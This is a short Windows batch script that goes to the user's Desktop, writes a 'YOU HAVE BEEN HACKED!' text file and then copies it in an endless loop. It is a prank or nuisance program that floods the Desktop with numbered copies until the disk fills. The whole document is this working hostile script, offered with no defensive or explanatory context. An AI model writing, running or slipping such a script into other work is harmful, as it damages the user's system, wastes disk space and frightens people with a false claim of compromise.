@ECHO OFF
:CODE
cd "%USERPROFILE%\Desktop\"
echo "YOU HAVE BEEN HACKED!" > HACKED.txt
SET /A X=%X%+1
copy HACKED.txt HACKED%X%.txt
ECHO THE NUMBER OF FILE'S COPIED %X%
IF %X% NEQ 0 GOTO CODE
PAUSE